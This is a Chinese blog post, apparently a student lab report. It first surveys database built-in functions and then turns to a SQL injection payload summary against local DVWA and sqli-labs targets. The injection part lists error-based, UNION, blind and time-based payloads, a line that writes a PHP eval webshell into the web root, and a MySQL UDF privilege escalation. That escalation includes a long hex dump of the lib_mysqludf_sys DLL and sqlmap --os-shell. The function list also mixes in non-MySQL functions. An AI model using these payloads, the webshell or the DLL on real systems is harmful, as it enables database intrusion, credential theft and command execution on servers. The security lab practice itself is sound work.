• 数据库内置函数研究

    数据库内置函数研究

    要求

    1、学习数据库自带函数的功能与用法(思考在什么情况下可以执行命令)

    2、将所有涉及的函数进行测试并举例说明其用法并形成报告

    实验环境

    采用docker下的mysql 5.7.38进行练习;

    image-20220622151027507

    学习思路

    image-20220622151942195

    内置函数介绍

    表数据

    image-20220622153058799

    系统函数汇总

    1、内部合计函数
    COUNT(*) 返回行数
    COUNT(DISTINCT COLNAME) 返回指定列中唯一值的个数
    SUM(COLNAME/EXPRESSION 返回指定列或表达式的数值和;
    SUM(DISTINCT COLNAME 返回指定列中唯一值的和
    AVG(COLNAME/EXPRESSION) 返回指定列或表达式中的数值平均值
    AVG(DISTINCT COLNAME) 返回指定列中唯一值的平均值
    MIN(COLNAME/EXPRESSION) 返回指定列或表达式中的数值最小值
    MAX(COLNAME/EXPRESSION) 返回指定列或表达式中的数值最大值
    2、日期与时间函数
    DAY(DATE/DATETIME EXPRESSION) 返回指定表达式中的当月几号
    MONTH(DATE/DATETIME EXPRESSION) 返回指定表达式中的月份
    YEAR(DATE/DATETIME EXPRESSION) 返回指定表达式中的年份
    WEEKDAY(DATE/DATETIME EXPRESSION) 返回指定表达式中的当周星期几
    DATE(NOT DATE EXPRESSION) 返回指定表达式代表的日期值
    TODAY 返回当前日期的日期值
    CURRENT[FIRST TO LAST] 返回当前日期的日期时间值
    COLNAME/EXPRESSION UNITS PRECISION 返回指定精度的指定单位数
    MDY(MONTH,DAY,YEAR) 返回标识指定年、月、日的日期值
    DATETIME(DATE/DATETIME EXPRESSION)FIRST TO LAST 返回表达式代表的日期时间值
    INTERVAL(DATE/DATETIME EXPRESSION)FIRST TO LAST 返回表达式代表的时间间隔值
    EXTEND(DATE/DATETIME EXPRESSION,[FIRST TO LAST]) 返回经过调整的日期或日期时间值
    3、代数函数
    ABS(COLNAME/EXPRESSION) 取绝对值
    MOD(COLNAME/EXPRESSION,DIVISOR) 返回除以除数后的模(余数)
    POW(COLNAME/EXPRESSION,EXPONENT) 返回一个值的指数幂
    ROOT(COLNAME/EXPRESSION,[INDEX]) 返回指定列或表达式的根值
    SQRT(COLNAME/EXPRESSION) 返回指定列或表达式的平方根值
    ROUND(COLNAME/EXPRESSION,[FACTOR]) 返回指定列或表达式的圆整化值
    TRUNC(COLNAME/EXPRESSION,[FACTOR]) 返回指定列或表达式的截尾值

    说明:上两者中FACTOR指定小数位数,若不指定,则为0;若为负数,则整化到小数点左边; 注:ROUND是在指定位上进行4舍5入;TRUNC是在指定位上直接截断; let tmp_float = round(4.555,2) --4.56 let tmp_float = trunc(4.555,2) --4.55

    4、指数与对数函数
    EXP(COLNAME/EXPRESSION) 返回指定列或表达式的指数值
    LOGN(COLNAME/EXPRESSION) 返回指定列或表达式的自然对数值
    LOG10(COLNAME/EXPRESSION) 返回指定列或表达式的底数位10的对数值
    5、三角函数
    COS(RADIAN EXPRESSION) 返回指定弧度表达式的余弦值
    SIN(RADIAN EXPRESSION) 正弦
    TAN(RADIAN EXPRESSION) 正切
    ACOS(RADIAN EXPRESSION) 反余弦
    ASIN(RADIAN EXPRESSION) 反正弦
    ATAN(RADIAN EXPRESSION) 反正切
    ATAN2(X,Y) 返回坐标(X,Y)的极坐标角度组件
    6、统计函数
    RANGE(COLNAME) 返回指定列的最大值与最小值之差 = MAX(COLNAME)-MIN(COLNAME)
    VARIANCE(COLNAME) 返回指定列的样本方差;
    STDEV(COLNAME) 返回指定列的标准偏差;
    7、其他数值函数
    USER 返回当前用户名
    HEX(COLNAME/EXPRESSION) 返回指定列或表达式的十六进制值
    LENGTH(COLNAME/EXPRESSION) 返回指定字符列或表达式的长度
    TRIM(COLNAME/EXPRESSION) 删除指定列或表达式前后的字符
    COLNAME/EXPRESSION ||COLNAME/EXPRESSION 返回并在一起的字符;
    RAND() 返回 0 到 1 的随机数
    ROUND(x) 返回离 x 最近的整数
    SIGN(x) 返回 x 的符号,x 是负数、0、正数分别返回 -1、0 和 1
    TRUNCATE(x,y) 返回数值 x 保留到小数点后 y 位的值(与 ROUND 最大的区别是不会进行四舍五入)
    FLOOR(x) 返回小于或等于 x 的最大整数
    8、字符串处理函数
    lower 将字符串中每个大写字母转换为小写字母
    upper 将字符串中每个小写字母转换为大写字母
    initcap 将字符串中每个词的首写字母转换成大写
    replace 将字符串中的某一组字符转换成其他字符,例replace(col,”each”,”eve”)
    substr 返回字符串中的某一部分,例substr(col,1,2)
    substring 返回字符串中的某一部分,例substring(col,from 1 to 4)
    ascii(s) 返回的是第一个字母的ascii码
    CONCAT(s1,s2...sn) 字符串 s1,s2 等多个字符串合并为一个字符串
    FIELD(s,s1,s2...) 返回第一个字符串 s 在字符串列表(s1,s2...)中的位置
    INSERT(s1,x,len,s2) 字符串 s2 替换 s1 的 x 位置开始长度为 len 的字符串
    LOCATE(s1,s) 从字符串 s 中获取 s1 的开始位置
    LEFT(s,n) 返回字符串 s 的前 n 个字符
    RIGHT(s,n) 返回字符串 s 的后 n 个字符
    MID(s,n,len) 从字符串 s 的 n 位置截取长度为 len 的子字符串,同 SUBSTRING(s,n,len)
    LTRIM(s) 去掉字符串 s 开始处的空格
    TRIM(s) 去掉字符串 s 开始和结尾处的空格
    9、其他函数
    hex 返回表达式的十六进制数
    round 返回表达式的四舍五入值
    trunc 返回表达式的截断值
    length 计算表达式的长度
    user 返回执行查询的用户的用户名(登陆帐户名)
    today 返回当前系统日期
    dbservername 返回数据库服务器的名称,同sitename
    dbinfo 返回数据库的相关信息
    decode 函数来将一个具有一个值的表达式转换为另一个值(decode函数不支持TEXT和BYTE类型。)
    Nvl 来将求值为空的表达式转化为另一个想要指定的值。
    系统函数实验
    count

    image-20220622153748581

    sum

    image-20220622153956480

    avg

    image-20220622154203355

    min

    image-20220622154223622

    max

    image-20220622154249000

    date

    image-20220622155331314

    time

    image-20220622155416078

    date-time

    image-20220622155522711

    now

    当前语句时间

    image-20220622155636018

    SYSDATE

    image-20220622155733474

    CONCAT
    1、语法及使用特点: CONCAT(str1,str2,…)  返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。可以有一个或多个参数。
2、使用示例: SELECT CONCAT(id, ‘,’, name)  user info LIMIT 1;

    image-20220622160031335

    concat_ws
    CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。但是CONCAT_WS()不会忽略任何空字符串。 (然而会忽略所有的 NULL)。

    image-20220622160218594

    group_concat

    ROUP_CONCAT函数返回一个字符串结果,该结果由分组中的值连接组合而成。

    image-20220622160346181

    if
    if(判断语句,是,否)  第一个参数是判断,正确执行第二个,错误执行第三个

    image-20220622160810691

    sleep

    休眠几秒

    image-20220622160904000

    left

    LEFT(str,len)

    返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL。

    image-20220622161042792

    right(str,len)

    返回最右边的n个字符的字符串str,或NULL如果任何参数是NULL。

    image-20220622161135079

    length

    返回字符串的长度,以字节为单位

    image-20220622161309953

    extractvalue

    这是一个对xml文件进行查询的函数,更准确地说,它是会从目标xml文件中返回所包含查询值的字符串,标准语法为:

    extractvalue('XML_document','Xpath_string')
//即
extractvalue('目标xml文件名','在xml中查询的字符串')

extractvalue函数一次只能查询32位长度,在爆表、列、值的时候 可用substring()函数截取
select (extractvalue(1,concat(0x7e,substring(hex((select database())),1,32))));
    substring
    substring(hex(aaa),x,y)中,x为从起始偏移值,y为长度,可变
    updatexml

    这是个修改xml文件的函数

    updatexml('XML_document','Xpath_string','New_value')
//即
updatexml('目标xml文件名','在xml中查询的字符串','替换后的值')

    mysql> select (updatexml(1,concat(0x7e,(database()),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~security~'
//第二个0x7e可以略去,但是第二个1不可略去,会导致函数不完整的报错

    image-20220622165728293

    user

    user返回当前数据库的用户名

    image-20220622165850050

    current_user

    image-20220622165920188

    system_user

    系统用户名

    image-20220622165957532

    version() mysql 数据库版本
    database() 当前数据库名
    user() 用户名
    current_user() 当前用户
    system_user() 系统用户名
    @@datadir 数据库路径
    @@version_compile_os 操作系统版本
    substr

    用于字符串的截取

    substr(字符串,起始位置,结束位置)

    image-20220622170336805

    ord

    ORD() 函数返回字符串第一个字符的 ASCII 值。

    image-20220622170505585

    hex和 unhex

    hex函数返回字符串的16进制 unhex返回16进制数的字符串形式

    image-20220622171206852

    find_in_set

    FIND_IN_SET()函数接受两个参数:

    ​ 第一个参数needle是要查找的字符串。
    ​ 第二个参数haystack是要搜索的逗号分隔的字符串列表。
    FIND_IN_SET()函数根据参数的值返回一个整数或一个NULL值:

    ​ 如果needle或haystack为NULL,则函数返回NULL值。
    ​ 如果needle不在haystack中,或者haystack是空字符串,则返回零。
    ​ 如果needle在haystack中,则返回一个正整数。

    image-20220622171627085

    还有很多ing

    SQL注入函数总结

    database()
mid()
substr()
ord()
ascii()
limit和offset
concat()
updatexml()
group_concat()
left()
right()
elt()
sleep()
length()
rand()
floor()	
exp()
hex()
order by

    组合搭配

    报错注入
    union select 1,group_concat(schema_name) from information_schema.schemata--+ 查库
union select 1,group_concat(table_name) from information_schema.tables where table_schema ='dvwa' 查表
union select 1,group_concat(column_name) from information_schema.columns where table_name='users' 查字段
union select 1,group_concat(user_id,user,password) from users 查数据
union select 1,'<?php eval($_post[shell]); ?>' into outfile 'C:/xampp/htdocs/dvwa/testtest.php' 写shell
    盲注
    http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))=115 --+ 数据库数量
http://127.0.0.1/sqlilab/Less-5/?id=1' and length(database())='9'--+  数据库长度
http://127.0.0.1/sqlilab/Less-5/?id=1' and left((select database()),1)='a'--+  当前数据库

第一个表
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101--+
第二个表
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=101--+
字段
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select username from security.users limit 0,1),1,1))=68–+
http://127.0.0.1/sqli-labs-master/Less-5/?id=1’ and ascii(substr((select password from security.users limit 0,1),1,1))=68–+
    延时
    ' and if(1=0,1, sleep(10)) --+ 
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+ 判断注入点:

if(*,*,*)
length(database())
true:sleep(10)   false:sleep(1)
if(length(database())=8,sleep(5),1)--+  猜数据库长度:
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(length(database())=8,sleep(10),sleep(1))--+


if(*,*,*)
left((select database()),1)='a'
true:sleep(10)   false:sleep(1)  猜数据库名字:
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(left((select database()),1)='a',sleep(10),sleep(1))--+


if(*,*,*)
left((select database()),1)='a' 查出所有表:
true:sleep(10)   false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(left((select database()),1)='a',sleep(10),sleep(1))--+


if(*,*,*) 查字段名字
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101–+
true:sleep(10)   false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=101,sleep(10),sleep(1))--+

猜字段数据
if(*,*,*)
ascii(substr((select username from security.users limit 0,1),1,1))=68–+
true:sleep(10)   false:sleep(1)
http://127.0.0.1/sqlilab/Less-9/?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(10),sleep(1))--+

    MySQL执行系统命令

    如何在mysql的命令行界面操作底层系统呢?
    只需要在mysql命令行界面使用system + linux命令即可

    mysql> system ls
bin   docker-entrypoint-initdb.d  home   media  proc  sbin  tmp
boot  entrypoint.sh               lib    mnt    root  srv   usr
dev   etc                         lib64  opt    run   sys   var
mysql> system ip a
sh: 1: ip: not found
mysql> system whoami
root
mysql> system ls
bin   docker-entrypoint-initdb.d  home   media  proc  sbin  tmp
boot  entrypoint.sh               lib    mnt    root  srv   usr
dev   etc                         lib64  opt    run   sys   var
mysql> system pwd
/
mysql>

    mysql-udf提权

    UDF

    UDF(Userdefined function)可翻译为用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,我就使用UDF加入一些函数进去,那么我就可以在mysql中使用这个函数了。

使用过MySQL的人都知道,MySQL有很多内置函数提供给使用者,包括字符串函数、数值函数、日期和时间函数等,给开发人员和使用者带来了很多方便。MySQL的内置函数虽然丰富,但毕竟不能满足所有人的需要,有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对MySQL进行一些扩展,幸运的是,MySQL给使用者提供了添加新函数的机制,这种使用者自行添加的MySQL函数就称为UDF(User Define Function)。

    mysql执行系统命令适用于直接连接数据库的情况下,理论上讲sqlmap的sql-shell也可行,但是在实际利用中对SQL注入点的类型,执行语句,语句长度都有很大的限制。

    思路:采用udf提权方式,上传udf.dll文件。
首选需要确定mysql的版本号,以及安装目录

    image-20220622203718708

    image-20220622203947000

    udf.dll存放位置分为2种情况。
    1、Mysql版本大于5.1
    udf.dll文件必须放在MySQL安装目录的lib\plugin文件夹下。
    2、Mysql版本小于5.1:
    win 2000 的服务器,需要将 udf.dll 文件导到 C:\Winnt\udf.dll 下。
    win2003 服务器,要将 udf.dll 文件导出在 C:\Windows\udf.dll 下。
    靶机的mysql版本号为 5.7.38大于5.1因此要把udf.dll文件放在MySQL安装目录的lib\plugin文件夹下。
    sqlmap中自带了udf.dll文件,放在data/udf中,文件经过异或编码无法直接使用,可以使用sqlmap/extra/cloak目录下的cloak.py文件进行解码

    因为docker环境很多命令都没有,换了本机window 使用phpstudy

    mysql版本大于5.1,所以放在/lib/plugin下,先找找plugin的位置

    show variables like 'plugin%';

    image-20220622205258242

    那么这个dll文件在哪了?这两个文件在sqlmap和msf里面都有内置。首先在sqlmap里面找一下,在sqlmap里面对应的目录地址为\sqlmap\data\udf\mysql,这里进入目录后可以看到sqlmap已经帮我们分好类了。分为windows和linux,点进去之后还会有32和64位之分

    image-20220622205334658

    所以我们可以通过以下命令来获取当前数据库及操作系统的架构情况,如下显示mysql是32位,操作系统是amd64

    image-20220622205451111

    不过 sqlmap 中 自带这些动态链接库为了防止被误杀都经过编码处理过,不能被直接使用。这里如果后缀名为.so_或dll_的话,就需要解码,如果后缀名为.so或.dll的话就不需要解码即可直接使用。这里sqlmap也自带了解码的py脚本,在/extra/cloak目录下,使用cloak.py解密即可。
    image-20220622205612987

    解码命令

    python cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll

    解码后

    image-20220622205820735

    方法1-失败

    通过如下命令将dll文件写入到plugin中

    select hex(load_file('E:\\collect\\sqlmap-master\\extra\\cloak\\lib_mysqludf_sys.dll')) into dumpfile 'D:\\phpStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll';
#这里windows下目录结构要进行转义双写

    image-20220622210106154

    上传之后,使用如下命令创建自定义函数

    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

    image-20220622211159711

    到这里报错了,百度后换一个办法。

    方法二失败

    使用notepad++打开udf文件

    image-20220622211348759

    复制内容进行16进制编码

    image-20220622211440930

    数据库中执行

    select 
0x4D5A3F0320202004202020F8F5F8F520203F2020202020204020202020202020202020202020202020202020202020202020202020202020202020203F20200E1F3F203F3F3F4C3F546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0A0D0A24202020202020204D477B3F26153F26153F26153F5E552D0B26153F5E20AC3F26153F5E677B0726153F5E61990B26153F910B3F26153F26143F26153F5E6E3B0826153F5E56670826153F5E525D08261550D06963680926153F2020202020202020202020202020202020202020202020504520204C0103204AE8635A20202020202020203F02210B010920201020202010202020602020607C2020207020202020AC202020202010201020202002202005202020202020200520202020202020203F202010202020202020022020202020102020102020202010202010202020202020102020207C3F200802202078E620203F20202020AC20203F202020202020202020202020202020202020526020201020202020202020202020202020202020202020202020202020202020202020202020202C7E2020482020202020202020202020202020202020202020202020202020202020202020202020202020202020202055505830202020202060202020102020202020202004202020202020202020202020202020AC202090E950583120202020201020202070202020102020200420202020202020202020202020204020203F72737263202020201020202020AC202020062020201420202020202020202020202020204020203F20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020332E393120555058210D0A0902083F3F3F77654F552020560C2020202220202620203FF8F5F8F5F8F55A702408333F01741656575AA924146A0C593F2010834FE66CE6653F5E5D9E77E3705A66240C1A6A071611105B41183218F8F5638E251CE6053F1E122021083F0175125A61040D0A9C136F0720750D0A10043F013270C2530D0A3F9C283C3053E5FA082D08F8F530F8F515F8F59CB1776C5737541A750856143F011B84145CF2013F9F69553C4152D4759D8D54142B87870D0A32555B315A710C3F02575F607E0E74145AAB10616D545396A07E5A7AED5A637D740F1B707C1B813250E00490FEF8F53F1A0C5A6C043F5CB20102507271F34C085477690E3F78113006E5F296D45775C954FA5F5E5D3F2174083391313F96F3591353565AA124108C7F5346028E4D8E077999085183CE5C42573F0B7594D182E614203F072008F8F570041E055381C21B3F223F535720032054090F093F6A6A7B0F698A6A733F3437139694540B1E85850D0A4E9C03552251513F553C7B51904568209C5E8B0F0158433F5B385A68603F3F3F204533F8F5595939387471683C7E90639054723F260C3B839F5B506A04F8F5753F606072B478169F3F533A9F1A483F407B693F2B7FC48C9A043B5056303F5B72304E285D545F03E81C0E3F93489CE93F3F4C20667BEC1810E6253E2059167060F8F5741A5B08827137F8F520594D1458E30669B980F46F183E5F205E64C594AD3F828E9ADB574708815C30087B57338715803240783F545CB601704C7E614251724F0856F8F53187E2E2126F8F658A6AF8F55D5C2050B13A585CB8030D0A092C23205F7C80E357036C6A081D1260C90D0A258B653F6C2F2C2D45636B3F1B405EF567A80B60506E423F200D0A1F783A5E3BF8F53F3F08203F7AFA3F069BC6F8F5566820AC20202D5BAE675820AC698108520FFF1D5E3C3F23580454549175054D734C262076E3648DE10880E6083FE0E204240607F8F50B4C113637595CF2F8F5881D0B7E325471750E39056B107E3CF8F573103F01E39B82F93F10543F5EE43F23480F544D7D615C3074AC1718065AA6040838071B76770D3F503F4A3F544A1768978D307F54033F09576797521262B5FF046B81573C3F4C6A6F9C733F5E3F6A1F98453F3F3F7597E095223F1F281A703F071B55B56F123F3F3F6A56357B4A96E22B73395C42696F9B139F6D40393D155C741C6806280973FB8E1C53960D0A3F34252316F8F593939D0599AE3F3F01592C5364226F78046FBE57DA24133F6E2351D0026677146C8019595BF8F571F24B77783B79523106350F52633F68344C89B63B3F10588B50A683DB3FE31772513F5A536A7C395399762907743F620E0F7C58DF8E678482559CF915441B474D97C092959D2C394D10033F7478EF09437AE5B3020C1A5CEA6BF51C3162861864442E3861613F58064C323F503F1B90700443375B96550C3F3F231F3F3F9A445D081C3F8E67543F84A49F042008016C2D57613B99B4393A44176E321B3FE1E33B993F0551D702752E19103F7F9A166E759957565F3F5E3F03641F703B67115A033F1620AC12376C7D270D0A3FE8642464205750623F661327202F527F5D961A3F11539C6603754376757C654F34032168742E2C0D0A2C3C3F7F3F71974209706A7C6FE03F5051597C644FD43FE16F2F9DEC19066B5F42809A2A92F981303F403F3F3B246A7C4469B47926547D7CE20C0D0A381E333F7CE65D38224F8528329C893F5F212043211C586321183F059C997FEA143C212179210C663F6C5FE3873806252C06200806053F9E350425202D7F9F2B5F1E4F973F30661624070428317B513F0807345AB45E31725A701D91237876011C1920241318092B18476A565F201C78223F712E58943F0D0A043F79273F243468637175D28D5C603F793F2C3F205D546CCC203F685B1B300B5FD2673F3F23401E801E6A484961A6144A50152E6FD858E057E581107B8567611C7E052C378A375FE297EE213F3551570A3F3F3F92B97F4B3F185B8E3E600B3F3F2C809857CD543F3F143F160D0A4B3F3D82D2F8F58EC7676C84178CBC1E079AEB1B994173AF3F59485D16568BA3183FE5A95A9C2A3F82E80807530250738C5E6050D93BE83799B95E25206C60533F3F6F356467452B7AB65A346627040B54192B5E6E413C037FB4385092C994F33F3F591C0B011C48180F65855B045D3F3F3F924E313F7A1F143F710696B65B6C33573F1817761BF8F5F8F52F8921487B9D75095A8208033F9E6F0D0A42515D283B8B17703F4F436A932781276AE4B786C19CD770040B056418205051B9080D0A83F270082F316C338226994F2F06905C3F58D20968555D4F5B4F8C3F1C6B049B913F3F64231350195C083B045D276F272451CC1F3F3F5FE579A82B034F2320596531932780CB1D8DE73F3FE1F5E3383F2426313F293432323F58054C503F3F68F7123F56096B278B686B204E60E39C2A6EA73160031F738CD45B6B6D033F5E143F6B3F3F888B3F6C120C7D0D0A812E6627616E525154147F3F3E7831243F140B8C000E56437789533F689D27626D8C4757F37E09936C3F986E3952263F542431498E6E0D0A353F96B856759D0C6371889BE05AA269B01F10333F14765AB820183F1C50A3983E7719330C113B9C71077DA9593F54890D0A7B047E3F62CE100B9E5E209AE6076C3F1E045E5F013F5C05646464646064686C14057664743F203F88880E034B0F20185F4E6F20F8F5F8F53F617267756D656E7473096C6C6F77656420287564663A206C69625F6D542C6D9C7573716C0D0A5F73085F696E666F29391853E8F8F53F76657273696F6E20302E01341F457870659C94572F637447657861076C79201A65207374723F5B8E069E532074791B757261712172583F602B74773F8C72030B3F5515206E616D4890FE3F436F756C246E6F74817861132030587A56186D277975F399A03F8D1B3F2003121071051B9A565860214707884A4D0D0A0B0F4F40074E8CCF8F3B033F3F08E73B2770960F3F0D0A3B034F7F537B3F032403287F7865512E20824C62713F8C7E5956197DFFF8F5200F5565FF0A20ED6271645455849B32E009F8F53F455C0410020157616974466F203F7E91535759654F626A073F6B3F5669727475616C4176035709370D0A536574456E76126F6E3F7CFE7E1161726961622B41184372659C6996D764F36806640D0A472643757272223F9BF7502A636573734914266E039121135469636B8FAC6B5BBE6D3151756572795003665234616E3716673F203F44697367374CE42077046962727879436162AF1A4973446562756767770D6D3F6A686546E5FB6E684072C88D296431644578467074697590696C4A6D295B61193F548F92E187176D0D0A3F4960DE78871A0D0A6B406F2870564047801173868E7F7755512295196E591B5C537973186D883278012E39417373650975697C3F8D114C7D5F687E396D5F2E553C86275F616D7367087869740B646A753A5F666469972317768F260D0A636B58649F66E1321F5F686F6F6B131459725F3F70014888DA8E683F49730D0A330D0A6C2190107D7A533F648A4E64083F0B130F651E6B5B7B801E2C72345697D21C182F9C8B6B710D0A035F706F5229475F777DC9106468756C5E3F6B85EA7D931B2C3F55BD8C716E821D65250866112E50078E0173746E03707908243978575C6B327E8D4D0F91891F5A80E67319663A1F5F4370705831837F3B52477CFE343F201817F8F5F8F5F8F5F8F53D193C1C1B161E55142D16270815270F11115F10130D0A070D0A2E17090705160C1E7F3FF8F5080D0A0B160918181505061B050C10060717062105110F061421110B086F7253E82B22052A111D0D0A18532D483806200776E3883F0C09330D0A090B0C05100706161294B8E4B40E0B34150B18160D0A3D05423F121E14066930F8F5524CF8F5110C0E1D4D0517230D0A0C3224080B4506759D0410043F0D0A6EF8F52C01043808041C1C0204203E4C016DF8F5213F204AE8635A5FC72002210B0109080C634F7A3F12133F3F200E103F01630B023F6259496107206003040233351E94AF7262341007063F33732A8E32203F033C1440023F1C57593F5052014370ED7BF93F42204262F068E0B182E78DD74073F3F5B9DF2593442602E72647D6108613F763F3F203F226F667C80402E26300304301B71E03F201A277E6D737263203F3F1B40731C4F784FA3E5AB761F0103200297DC60497B27421B3F03202078A188C4127C53030420202020202020ACF8F52020202020202020202020AC7C2408010F5402012020603F7020105D55203FF8F557517AF8F53F6099609006463F47018E30073F51BE3F8E28780001202020018E30073F51BE3F3F3F8E2B98D6093F51BE3F8E2B3F84DB3F720D0A62CE083F4651C1F8F5747458DF018E30073F51BE3F3F3F8E30073F51BE3F3F84C72041018E30073F51BE3F3F3F8E2B98D6093F51BE3F8E2B92EC3F4FA1203FF8F55184013F2F51D69EFA0F3F423F47497593D663F8F5F8F5F8F5609102515F043F51660451AE04773F79654CF8F5F8F5F8F55E59283F2020203F472C3F01779C7B3F20759A4407596F046651CC08667E1055A3299D22815301995307516605580C8D535D55205020203F097E933C5A89045D093078D62020019A6A516608F8F5683672202066690747087E938ECC9D5A48864D55F8F56847722020097E93073F516004813661317F060C205166045CD63F7F1E0747097E93223C98DB110181230355A3667E1055A301995303811E240F62CE10663F516602811E5AEF9D1520205D55203FF8F53F10202050546A045357F8F58AD03F02202020AC207F20AC60287F585054505357F8F58A9C615CB22420AC6A203981979DE5977269843FF8F5202020482020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020203020101022201001202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202004202020202001201820202018202020AC202020202020202004202020202001200220202030202020AC2020202020202020042020202020012009042020482020205C20AC2020560220203F202020202020584020203C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E5041202020202020202020202020103F20994C20202020202020202020202020201D3F20083F202020202020202020202020202020202020202020283F20363F20463F20563F20643F2020202020723F20202020204B45524E454C33322E444C4C204D5356435239302E646C6C20204C6F61644C69627261727941202047657450726F634164647265737320205669727475616C50726F7465637420205669727475616C416C6C6F6320205669727475616C467265652020206672656520202020202020204AE8635A20202020583F20012020201220202012202020E628202097782020343F20211020203F2020201020203F20203F20203F20203F20203F20203F20203F20203F20203F2020761020203F2020431020202E1120201A1120203F20206D3F20510E2020722020207C8D202083BF20208DA7202096F120209B5F2020043F20123F201B3F202B3F20393F20413F20503F205D3F20653F20743F2020200120022003200420052006200720082009200D0A200B200C200D0A200E200F20102011206C69625F6D7973716C7564665F7379732E646C6C206C69625F6D7973716C7564665F7379735F696E666F206C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974206C69625F6D7973716C7564665F7379735F696E666F5F696E6974207379735F62696E6576616C207379735F62696E6576616C5F6465696E6974207379735F62696E6576616C5F696E6974207379735F6576616C207379735F6576616C5F6465696E6974207379735F6576616C5F696E6974207379735F65786563207379735F657865635F6465696E6974207379735F657865635F696E6974207379735F676574207379735F6765745F6465696E6974207379735F6765745F696E6974207379735F736574207379735F7365745F6465696E6974207379735F7365745F696E69742020202020702020102020206D3C683E6C3E2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020
into outfile 'D:/phpStudy/PHPTutorial/MySQL/lib/plugin/udf.dll';

    可以看到成功了

    image-20220622212134647

    创建sys_eval

    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

    image-20220622212411567

    又失败了。。。。。。。。。。。。。。。。。

    使用sqlmap吧,再不行,我也不知道怎么弄了,求师傅指点,下次再试试

    方法三-sqlmap成功

    sqlmap.py -d "mysql://root:root@127.0.0.1:3306/mysql" --os-shell

    image-20220622212754189

    可以看到终于成功了,虽然前面几次都失败了,但是试了过程,也有所收获,加油吧!
  • 相关阅读:
    (转)样本方差的期望
    (转)Python 字典排序
    曝光补偿
    python判断字符串是否包含子字符串
    python requests接口测试 -----博客园串接口
    jmeter+ant+jenkins 搭建接口自动化测试
    TOMCAT闪退。cmd执行startup.bat保错:the CATALINA_HOME environment variable is not defined correctly
    selenium python自动化测试 ddt数据驱动
    jenkins到底如何拉取代码 如何部署的
    git 常用命令
  • 原文地址:https://www.cnblogs.com/liyu8/p/16403171.html
Copyright © 2020-2023  润新知